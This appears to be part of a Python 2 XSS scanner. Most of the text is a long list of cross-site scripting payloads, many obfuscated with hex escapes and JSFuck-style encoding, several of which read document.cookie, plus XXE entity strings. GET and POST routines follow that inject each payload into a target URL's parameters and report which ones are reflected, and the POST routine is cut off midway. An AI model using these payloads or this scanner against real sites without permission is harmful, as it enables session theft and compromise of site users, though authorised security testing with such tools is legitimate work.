SRC=java\\0script:alert(\\"X\\")&gt;";\' &gt; out', 'perl -e \'print "&lt;SCR\\0IPT&gt;alert(\\"X\\")&lt;/SCR\\0IPT&gt;";\' &gt; out', 'perl -e \'print "<IMG SRC=java\\0script:alert(1)>";\'> out', 'window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()', 'window["ale"+"\\x72\\x74"]()', 'window["\\x61\\x6c\\x65\\x72\\x74"]()', "window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()", "window['ale'+'\\x72\\x74']()", "window['\\x61\\x6c\\x65\\x72\\x74']()", 'window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))', 'window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]', 'this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()', 'this["ale"+"\\x72\\x74"]()', 'this["\\x61\\x6c\\x65\\x72\\x74"]()', "this['ale'+'\\x72\\x74']()", "this['\\x61\\x6c\\x65\\x72\\x74']()", 'this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))', 'this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]', 'this["document"]["cookie"]', 'this["document"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["cookie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]', "this['document']['cookie']", "this['document']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['cookie']", "this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']", 'document["cookie"]', 'document["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', "document['cookie']", "document['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", '%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x6F\\x6F\\x6B\\x69\\x65\\x26\\x72\\x70\\x61\\x72\\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E', '<meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', '"><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', '\'><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', "<iframe/onload=action=/confir/.source+'m';eval(action)(1)>", '"><iframe/onload=action=/confir/.source+\'m\';eval(action)(1)>', "'><iframe/onload=action=/confir/.source+'m';eval(action)(1)>", '<!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->', '"><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->', "'><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->", '<img src=x onerror=confirm(/X/)>', '"><img src=x onerror=confirm(/X/)>', "'><img src=x onerror=confirm(/X/)>", '<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>', '"><form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>', "'><form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)> <button/type=submit>", '<style/onload = !-alert&#x28;1&#x29;>', '"><style/onload = !-alert&#x28;1&#x29;>', "'><style/onload = !-alert&#x28;1&#x29;>", '<iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', '"><iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', '\'><iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', '<svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);', '"><svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);', "'><svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);", '"><img src=x onerror=confirm(1);>', '#&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;', '<img/src=x alt=confirm(1) onerror=eval(alt)>', '"><img/src=x alt=confirm(1) onerror=eval(alt)>', "'><img/src=x alt=confirm(1) onerror=eval(alt)>", '<img src=x onerror=alert(1)//>', '"><img src=x onerror=alert(1)//>', "'><img src=x onerror=alert(1)//>", '<svg><g/onload=alert(1)//', '"><svg><g/onload=alert(1)//', "'><svg><g/onload=alert(1)//", '<iframe/\\/src=jAva&Tab;script:alert(1)>', '"><iframe/\\/src=jAva&Tab;script:alert(1)>', "'><iframe/\\/src=jAva&Tab;script:alert(1)>", '<math><mi//xlink:href="data:x,<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', 'onClick="alert(\'Hello \\u0022>\')"', 'onload=alert(1)', '" onload=alert(1) "', '" onload=alert(1)', 'onload=alert(1) "', '" onload=alert(1) id="a', 'onload =alert(1) id="a', "<a href='", '"><a href=\'', "'><a href='", "javascript:alert(1)'>a</a>", '<listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>', '"><listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>', '\'><listing>&lt;img onerror="alert(1);//" src=1&gt;<t t></listing>', "<img src=x id/=' onerror=alert(1)//'>", '"><img src=x id/=\' onerror=alert(1)//\'>', "'><img src=x id/=' onerror=alert(1)//'>", '<textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->', '"><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->', "'><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->", '<b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>', '"><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>', "'><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>", '<b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '"><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '\'><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '<body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>', '"><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>', "'><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>", '<a href="\x01java\x03script:alert(1)">X<a>', '"><a href="\x01java\x03script:alert(1)">X<a>', '\'><a href="\x01java\x03script:alert(1)">X<a>', '\x01<option><style></option></select><b><img src=xx: onerror=alert(1)></style></option>', '<option><iframe></select><b><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></iframe></option>', '<b><style><style/><img src=xx: onerror=alert(1)>', '"><b><style><style/><img src=xx: onerror=alert(1)>', "'><b><style><style/><img src=xx: onerror=alert(1)>", '<b><style><style////><img src=xx: onerror=alert(1)></style>', '"><b><style><style////><img src=xx: onerror=alert(1)></style>', "'><b><style><style////><img src=xx: onerror=alert(1)></style>", '<image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>', '"><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>', "'><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>", '<image name=activeElement><svg onload=alert(1)>', '"><image name=activeElement><svg onload=alert(1)>', "'><image name=activeElement><svg onload=alert(1)>", '<image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>', '"><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>', "'><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>", '<div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '"><div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '\'><div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '<div wow=removeme onmouseover=alert(1)>text', '"><div wow=removeme onmouseover=alert(1)>text', "'><div wow=removeme onmouseover=alert(1)>text", '<input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>', '"><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>', "'><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>", '<form action="javascript:alert(1)"><button>X</button></form>', '"><form action="javascript:alert(1)"><button>X</button></form>', '\'><form action="javascript:alert(1)"><button>X</button></form>', '0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(\'data:;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'))', '<input onfocus=alert(1) autofocus>', '"><input onfocus=alert(1) autofocus>', "'><input onfocus=alert(1) autofocus>", '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '\'><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>', '"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>', "'><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", '<script>({0:#0=alert/#0#/#0#(0)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', '"><script>({0:#0=alert/#0#/#0#(0)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', "'><script>({0:#0=alert/#0#/#0#(0)})</script>", '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', 'X<x style=`behavior:url(#default#time2)` onbegin=`alert(1)` >', '<meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '"><meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '\'><meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '<input onblur=focus() autofocus><input>', '"><input onblur=focus() autofocus><input>', "'><input onblur=focus() autofocus><input>", '<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>', '"><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>', "'><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>", '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>', '<link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d", '<style>@import "data:,*%7bx:expression(alert(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(alert(1))%7D";</style>', '\'><style>@import "data:,*%7bx:expression(alert(1))%7D";</style>', '<table background="javascript:alert(32)"></table>', '"><table background="javascript:alert(32)"></table>', '\'><table background="javascript:alert(32)"></table>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '<![><img src="]><img src=x onerror=alert(1)//">', '"><![><img src="]><img src=x onerror=alert(1)//">', '\'><![><img src="]><img src=x onerror=alert(1)//">', '<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '\'><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '<<style><img src="</style><img src=x onerror=alert(1)//">', '"><<style><img src="</style><img src=x onerror=alert(1)//">', '\'><<style><img src="</style><img src=x onerror=alert(1)//">', '"><style><img src="</style><img src=x onerror=alert(1)//">', '\'><style><img src="</style><img src=x onerror=alert(1)//">', '<<li style=list-style:url() onerror=alert(1)></li>', '"><<li style=list-style:url() onerror=alert(1)></li>', "'><<li style=list-style:url() onerror=alert(1)></li>", '"><li style=list-style:url() onerror=alert(1)></li>', "'><li style=list-style:url() onerror=alert(1)></li>", '<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>", '<video onerror="alert(1)"><source></source></video></div>', '"><video onerror="alert(1)"><source></source></video></div>', '\'><video onerror="alert(1)"><source></source></video></div>', '<b <script>alert(1)//</script>0</script></b>', '"><b <script>alert(1)//</script>0</script></b>', "'><b <script>alert(1)//</script>0</script></b></div>", '"><b <script>alert(1)//</script>0</script></b></div>', "'><b <script>alert(1)//</script>0</script></b></div>", '<b><script<b></b><alert(1)</script </b></b>', '"><b><script<b></b><alert(1)</script </b></b>', "'><b><script<b></b><alert(1)</script </b></b></div>", '"><b><script<b></b><alert(1)</script </b></b></div>', "'><b><script<b></b><alert(1)</script </b></b></div>", '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '<x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<! \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><! \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><! \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<div id="1"><embed src="javascript:alert(1)">', '"><embed src="javascript:alert(1)">', '\'><embed src="javascript:alert(1)"></embed>', '<script src="javascript:alert(1)">', '"><script src="javascript:alert(1)">', '\'><script src="javascript:alert(1)"></script>', '"><script src="javascript:alert(1)"></script>', '\'><script src="javascript:alert(1)"></script>', '<!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '"><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '\'><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', '"><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', '\'><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', 'onerror CDATA "alert(1)"', 'onload CDATA "alert(1)">', '<html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '"><html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '\'><html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '\'><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '<div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x", '<// style=x:expression\x028alert(1)\x029>', '"><// style=x:expression\x028alert(1)\x029>', "'><// style=x:expression\x028alert(1)\x029>", '<event-source src="index.php" onload="alert(1)">', '"><event-source src="index.php" onload="alert(1)">', '\'><event-source src="index.php" onload="alert(1)">', '<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '"><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '\'><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '<?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '\'><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '<object allowscriptaccess="always" data="test.swf"></object>', '"><object allowscriptaccess="always" data="test.swf"></object>', '\'><object allowscriptaccess="always" data="test.swf"></object>', '<style>*{x:??????????(alert(1))}</style>', '"><style>*{x:??????????(alert(1))}</style>', "'><style>*{x:??????????(alert(1))}</style>", '<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', '"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', '\'><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '\'><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '\'><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '\'><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '<body oninput=alert(1)><input autofocus>', '"><body oninput=alert(1)><input autofocus>', '\'><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">', '"><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">', '\'><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">']
def GET(url,level):
result = {}
result['value']=None
result['payload']=None
try:
try:
site = url
finalurl = urlparse.urlparse(site)
urldata = urlparse.parse_qsl(finalurl.query)
domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl)
domain = domain0.replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
connection = httplib.HTTPConnection(domain)
connection.connect()
url = site
paraname = []
paravalue = []
payloads = []
if level == 1:
payloads = payload_1
if level == 2:
payloads = payload_2
if level == 3:
payloads = payload_3
if level == 4:
payloads = payload_4
o = urlparse.urlparse(site)
parameters = urlparse.parse_qs(o.query, keep_blank_values=True)
path = urlparse.urlparse(site).scheme + "://" + urlparse.urlparse(site).netloc + urlparse.urlparse(
site).path
for para in parameters: # Arranging parameters and values.
for i in parameters[para]:
paraname.append(para)
paravalue.append(i)
# 定义
fpar = []
progress = 0
for pn, pv in zip(paraname, paravalue): # Scanning the parameter.
fpar.append(str(pn))
for x in payloads: #
validate = x.translate(None, whitespace)
if validate == "":
progress = progress + 1
else:
progress = progress + 1
enc = urllib.quote_plus(x)
data = path + "?" + pn + "=" + pv + enc
page = urllib.urlopen(data)
sourcecode = page.read()
if x in sourcecode:
result['value'] = pn
result['payload']=x
return result
except:
pass
except:
pass
def POST(domains,data,level):
results = {}
results['value']=None
results['payload']=None
try:
try:
try:
br = mechanize.Browser()
br.addheaders = [('User-agent',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')]
br.set_handle_robots(False)
br.set_handle_refresh(False)
site = domains
finalurl = urlparse.urlparse(site)
urldata = urlparse.parse_qsl(finalurl.query)
domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl)
domain = domain0.replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
connection = httplib.HTTPConnection(domain)
connection.connect()
path = urlparse.urlparse(site).scheme + "://" + urlparse.urlparse(site).netloc + urlparse.urlparse(
site).path
url = site
param = data
payloads = []
if level == 1:
payloads = payload_1
if level == 2:
payloads = payload_2
if level == 3:
payloads = payload_3
if level == 4:
payloads = payload_4
lop = str(len(payloads))
params = "http://www.analyz3r.cn/?" + param
finalurl = urlparse.urlparse(params)
urldata = urlparse.parse_qsl(finalurl.query)
o = urlparse.urlparse(params)
parameters = urlparse.parse_qs(o.query, keep_blank_values=True)
paraname = []
paravalue = []
for para in parameters: # Arranging parameters and values.
for i in parameters[para]:
paraname.append(para)
paravalue.append(i)
fpar = []
fresult = []
total = 0
progress = 0
pname1 = [] # parameter name
payload1 = []
